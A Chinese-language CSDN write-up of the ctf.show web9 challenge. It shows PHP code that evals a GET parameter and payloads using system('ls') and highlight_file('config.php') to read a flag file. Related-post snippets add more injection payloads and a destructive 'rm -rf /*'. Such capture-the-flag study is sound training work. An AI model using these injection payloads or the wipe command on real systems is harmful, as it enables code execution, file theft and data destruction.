CTF.show:萌新:web9

最新推荐文章于 2024-05-09 11:03:11 发布
最新推荐文章于 2024-05-09 11:03:11 发布
阅读量480 收藏 2
点赞数
分类专栏: CTF_Web_Writeup CTF.show
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/113664792
版权 
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

题目要求我们利用 system、exec、highlight才能执行eval()。
构造

?c=system('ls');

发现存在两个文件
在这里插入图片描述
构造
highlight_file() 函数对文件进行语法高亮显示。

?c=highlight_file(’config.php‘);

得到flag
在这里插入图片描述

FW_ENJOEY
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ctfshow web 入门1~20题(萌新向)
weixin_52805837的博客
12-29 3903
Ctfshow web 入门1~12题 web1: 打开网址显示如下: F12直接查看源码即可得到flag web2: ctrl+u打开源码即可得到flag web3: 根据提示“没思路抓个包看看,可能有意外收获” 抓包之后,如上得到了flag web4: ...
ctfshow-萌新-web9( 利用命令执行漏洞读取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web9关,这一关考察的是命令执行漏洞的利用方式,使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag 页面中展示了部分源码,很明显是作者提示我们利用命令执行漏洞,并提示 flag 就在 config.php 文件中 提交的参数中必须包含 system,exec,highlight其中一个关键字,才能使用 eval()函数执行PHP代码,我们先用 system()执行系统命令,看能否正常使用 ?c=system('ls'...
ctfshow之_萌新web9至web10
最新发布
XiaoXiao_RenHe的专栏
05-09 430
ctfshow之_萌新web9至web10
ctfshow-web9
aarong的博客
12-25 1653
如题又是登录框,这次尝试了前面几题方法都没方法做出来,只好换一种思路,先对这网站的后台进行扫描(这里使用了很多种扫描工具比如dirb、dirbbuster都太拉了,扫了个寂寞,最后还是使用了下面这个工具扫出来的) dirsearch扫描网站目录: dirsearch -u http://079eb967-1867-4064-85b7-ee3490881e14.challenge.ctf.show/ 扫描时间比较久,可以打一两把游戏再来看结果。扫描发现网站目录中存在robots.txt 打开robots.
ctf新手总结--web做题
Martin-share的博客
10-24 1614
ctf新手总结--web做题
CTFshow--web入门--命令执行(29--55)
weixin_53425135的博客
11-23 2475
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
CTFSHOW 萌新计划web9-15
羽的博客
04-03 2619
题目地址:http://ctf.show 0x01 web9 乍一看别被迷惑了,这个正则是字符串中包含 system、exec、highlight才能执行eval()。 if(preg_match("/system|exec|highlight/i",$c)){ eval($c); } 所以很简单,直接 c=highlight_file('conf...
ctf.rip:CTF.RIP Jekyll静态网站
04-04
ctf.rip-来自捕获赃物的CTF编写 此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用...
ctf.lib:somectf文件
04-09
标题中的“ctf.lib:somectf文件”可能指的是某个CTF赛事中使用的库或者工具,具体到这个例子中,可能是参赛者或者组织者用于比赛的一份资源库,名为“ctf.lib”,其中包含了某个特定的CTF挑战,可能是安全漏洞的模拟...
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出...
ist的matlab代码-darkarmy-ctf.github.io:darkarmy-ctf.github.io
05-26
ist的matlab代码黑暗军团 描述: Dark Army是一支由CTF组成的国际团队,...活动:9月25日,上午8:30(IST)-9月27日,上午8:30(IST) 分类: 网页 各种各样的 法证 倒车 Pwn 加密货币 OSINT 旗帜! 捕捉全部! 链接:
jopraveen.github.io:CTF 网站
08-04
【标题】"jopraveen.github.io:CTF 网站" 涉及的知识点主要集中在构建一个用于网络安全竞赛(Capture The Flag, CTF)的在线平台。CTF 是一种流行的信息安全教育和竞技形式,参与者通过解决各种安全挑战来提升技能。...
ctfshow之web(9、10、11、12)
沃和莱特的博客
03-12 5140
萌新萌新,不忘初心。
CTFShow“萌心区“WP题解
qq_41274349的博客
03-24 9080
CTFSow网站 萌新区题目概览: 萌新区一共47题,本文带来前45题的详细WP,最后两道题等待更新。 0x01 萌新认证 这道题,就是普通签到题,加入群,查看群公告即可。 或者喊一声萌新码 注意:萌新码是从一个固定池里随机分配的,不是统一的; 0x02:萌新_密码1: 看到一大串字母和英文,看了一下,没有大于F的字母,应该是16进制,将这串字符串进行base16转换【16进制转字符串】 解码后的字符串,凭感觉像base64编码,进行base64译码 ...
ctfshow 萌新web题解
qq_41788704的博客
10-09 1285
web1 十六进制 0x38e web2 异或 200^800 按位与 992|8 web3 加减乘除都可以 --1000 负负得正 web4 id=1 or 1=1# id=id# 上面是显示所有的数据,flag自然也会在里面 ‘1000’ MySQL会自动转换类型 web5 异或 144^888 web6 取反 ~~1000 web7 二进制 0b1111101000 web8 rm -rf /* 删库跑路?? web9 可以直接执行命令 system('cat config.php
ctfshow web 9
trytowritecode的博客
10-20 544
分享一道很有意思的题目 前面好几道题都是sql注入的语句,这边也下意识想着是sql注入,然后测试了很多sql语句发现行不通 就觉得该换个思路 那就扫描下目录吧(我发现dirmap的字典有点拉胯不知道为什么)用dirmap啥都扫不出来于是就换了 dirsearch然后去扫扫出了一个robots.txt 然后就是访问这个地址给你一个下载链接我们直接打开得到 <?php $flag=""; $password=$_POST['password']; if(strlen($pass
[Ctf show web]萌新计划9
DdddddXxxxx的博客
07-20 230
preg_match (A,B) 要求B包含A preg_match($a,$b) 函数可以返回$a匹配次数,它的值将是 0 次(不匹配)或 1 次,因为 preg_match() 在第一次匹配后将会停止搜索。 eval($c) 这个是最后的输出 是flag 题目上面有说明 flag in config.php 说明flag在config.php里 构造 ?c=highlight_file('./config.php') ...
ctfshow简单题web1-15
qq_62984336的博客
03-10 924
ctfshow萌新 ctfshow萌新web1web2-4web5-7web5web6web7web9web10web11web12web13web14、15 总结:这几题主要都是正则匹配字符过滤的绕过,基本步骤都是源码中查看过滤规则->找到注入点->传入payload。只在web1中写了比较完整的步骤,剩下的题目主要只说对于字符过滤的绕过方法。 web1 1.手动注入。需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 .
ctf.show萌新web8
07-12
你好!对于 CTF 中的 web8 题目,我可以给你一些指导。请注意,我只能提供一般性的提示,具体的解题方法还需要你自己去发现。 首先,你需要访问 ctf.show 网站上的 web8 页面。在该页面上,你可能会看到一些输入框或按钮等与用户交互的元素。尝试对这些元素进行各种输入和点击操作,看看是否会触发一些特殊的反应。 在与页面交互的过程中,要特别注意页面的响应和返回的内容。查看页面源代码、网络请求和响应,可能会给你一些线索。尝试通过修改请求参数或 URL 来探索是否存在漏洞或隐藏的功能。 常见的漏洞类型包括但不限于 XSS(跨站脚本攻击)、SQL 注入、文件包含、命令执行等。了解这些漏洞类型,并尝试在页面上找到相关的漏洞点。 此外,还可以尝试使用一些常见的工具,如 Burp Suite、OWASP Zap 等来辅助你进行渗透测试。 记住,在 CTF 中,探索和尝试是非常重要的。不要害怕失败,多思考、多尝试,相信你一定能找到解题的线索!祝你好运!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值